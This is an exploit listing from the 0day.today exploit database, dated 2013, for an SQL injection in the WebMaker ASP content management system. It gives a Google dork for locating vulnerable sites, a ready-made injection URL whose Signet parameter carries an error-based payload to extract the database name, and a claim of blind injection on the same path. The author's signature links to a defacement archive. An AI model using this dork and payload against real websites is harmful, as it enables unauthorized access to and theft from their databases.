[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WebMaker SQL Injection Vulnerability

Author
Mormoroth
Risk
[
Security Risk High
]
0day-ID
0day-ID-20178
Category
web applications
Date add
14-01-2013
Platform
asp
# Exploit Title: WebMaker SQL Injection
# Google Dork: intext:"Powered by WebMaker"
# Date: 13.1.2013
# Exploit Author: Mormoroth
# Vendor Homepage: http://www.webexpert.ch
# Tested on: Windows
# Affected Version : All versions
---------------------------------

Webmaker is also vulnerable to Blind SQL Injection in same path

------------SQL INJECTION--------

http://site.com/navigation/cmd_processor.asp?Class=navigation&Id=148&Language=IT&OrgID=5&Signet=' or 1=convert(int,db_name())--

---------------------------------

ISCN TEAM

http://blog.mormoroth.ir
http://ha.cker.ir
Follow me on Twitter And Facebook
http://twitter.com/Mormoroth
http://facebook.com/ISCNTEAM

ISCN Special Defacements Archive
http://www.zone-h.org/archive/special=1/notifier=ISCN

Special Thanks to Yashar Shahinzadeh
http://Y-shahinzadeh.ir
http://Twitter.com/YShahinzadeh
From Iran

#  0day.today [2024-09-28]  #